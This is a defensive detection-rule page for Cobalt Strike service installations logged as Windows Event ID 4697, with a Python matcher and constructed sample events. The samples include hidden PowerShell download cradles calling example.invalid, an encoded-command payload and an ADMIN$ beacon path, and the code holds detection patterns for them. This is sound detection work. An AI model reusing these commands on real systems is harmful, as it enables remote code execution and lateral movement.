
Summary
This detection rule identifies service installations characteristic of Cobalt Strike, a commercial adversary-simulation and penetration-testing tool that is widely abused by threat actors for privilege escalation and lateral movement inside a network. The rule targets Windows systems and relies on Security log Event ID 4697 ("A service was installed in the system"), which records the name, file path and account of every newly installed service. An alert fires when the service file name shows one of the patterns Cobalt Strike uses when it installs a service to elevate privileges or move laterally: an executable written to an ADMIN$ share (a \\host\ADMIN$\...exe path, as used by its PsExec-style lateral movement), or a PowerShell invocation that carries an encoded command (-EncodedCommand and its short forms) or a download cradle that fetches and runs a script from a remote source. Two caveats apply when deploying it. Event ID 4697 is only written when the "Audit Security System Extension" subcategory (Advanced Audit Policy Configuration, System category) is enabled; on hosts without it, Event ID 7045 from Service Control Manager in the System log records the same installation and image path and can feed an equivalent rule. And legitimate installers also create services whose image path ends in .exe, so matches must be anchored on the ADMIN$ share or the PowerShell indicators rather than on the extension alone, and tuned against known-good service paths. Service installations are rare on most hosts, so each alert warrants review; confirming the service path, the installing account and the origin of the image at installation time gives a fast route from detection to incident response.
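The following is an added example, not the rule's own logic or code from the vendor of this page: it parses rendered Event ID 4697 messages and applies the three matching branches the summary describes. The event texts, host names, share path and service names are constructed for the example, the regular expressions are my own approximations of the rule's conditions rather than its exact expressions, and the ADMIN$ branch is implemented as a conjunction (share path and .exe together) because matching any .exe alone would fire on every service install. The encoded-command branch additionally decodes the base64 UTF-16LE payload so the download cradle hidden inside it is also caught.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed Cobalt Strike style one-liner (not from a real intrusion), encoded
# the way powershell.exe -EncodedCommand expects it: UTF-16LE, then base64.
PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed 4697 messages in the rendered layout of the Security log; only the
# fields the rule reads are filled in. Host, share and service names are invented.
SAMPLE_EVENTS = [
    # 1. Benign vendor service: an .exe path, but no ADMIN$ share and no PowerShell.
    "A service was installed in the system.\n"
    "Service Information:\n"
    "\tService Name:\t\tBackupAgent\n"
    "\tService File Name:\t\"C:\\Program Files\\Contoso\\agent.exe\" --service\n"
    "\tService Account:\t\tLocalSystem",
    # 2. Beacon binary dropped into the admin share and registered as a service.
    "A service was installed in the system.\n"
    "Service Information:\n"
    "\tService Name:\t\t5c2e1b4\n"
    "\tService File Name:\t\\\\127.0.0.1\\ADMIN$\\5c2e1b4.exe\n"
    "\tService Account:\t\tLocalSystem",
    # 3. Hidden PowerShell with an encoded command as the service image.
    "A service was installed in the system.\n"
    "Service Information:\n"
    "\tService Name:\t\tf3a9d07\n"
    f"\tService File Name:\t%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand {ENCODED}\n"
    "\tService Account:\t\tLocalSystem",
    # 4. Plain-text download cradle as the service image.
    "A service was installed in the system.\n"
    "Service Information:\n"
    "\tService Name:\t\tUpdater\n"
    "\tService File Name:\tpowershell -nop -w hidden -c \"IEX ((New-Object Net.WebClient).DownloadString('http://example.invalid/b'))\"\n"
    "\tService Account:\t\tLocalSystem",
]

# -e / -ec / -enc / -encodedcommand followed by a base64 blob (assumed forms).
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Common PowerShell download cradles (assumed indicator list, not the rule's own).
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)


def parse_4697(message: str) -> Dict[str, str]:
    """Extract the tab-separated 'Label:<tab>Value' fields of a rendered 4697 message."""
    fields: Dict[str, str] = {}
    for line in message.splitlines():
        m = re.match(r"\s*([A-Za-z ]+):\t+(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def decode_encoded_command(path: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def match_service_install(fields: Dict[str, str]) -> List[str]:
    """Return the rule branches the event matches; an empty list means no alert."""
    path = fields.get("Service File Name", "")
    low = path.lower()
    hits: List[str] = []
    # Branch 1: executable served from an ADMIN$ share. Both tokens are required.
    if "admin$" in low and ".exe" in low:
        hits.append("admin_share_exe")
    if "powershell" in low:
        decoded = decode_encoded_command(path)
        # Branch 2: encoded command flag present.
        if ENCODED_FLAG.search(path):
            hits.append("powershell_encoded")
        # Branch 3: download cradle, in clear text or inside the decoded payload.
        if DOWNLOAD_CRADLE.search(path) or (decoded and DOWNLOAD_CRADLE.search(decoded)):
            hits.append("powershell_download")
    return hits


def run_rule(messages: List[str]) -> List[dict]:
    """Apply the rule to rendered 4697 messages and return one alert per match."""
    alerts = []
    for msg in messages:
        fields = parse_4697(msg)
        hits = match_service_install(fields)
        if hits:
            alerts.append({
                "service": fields.get("Service Name"),
                "branches": hits,
                "decoded": decode_encoded_command(fields.get("Service File Name", "")),
            })
    return alerts


if __name__ == "__main__":
    for alert in run_rule(SAMPLE_EVENTS):
        print(alert)
```

Running the block prints three alerts (the benign Contoso service produces none); the third carries the decoded cradle so an analyst sees the remote URL without decoding by hand. The same matching function can be fed Event ID 7045 records by mapping the ImagePath field onto "Service File Name".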
Categories
- Windows
- Endpoint
Data Sources
- Service
Created: 2021-05-26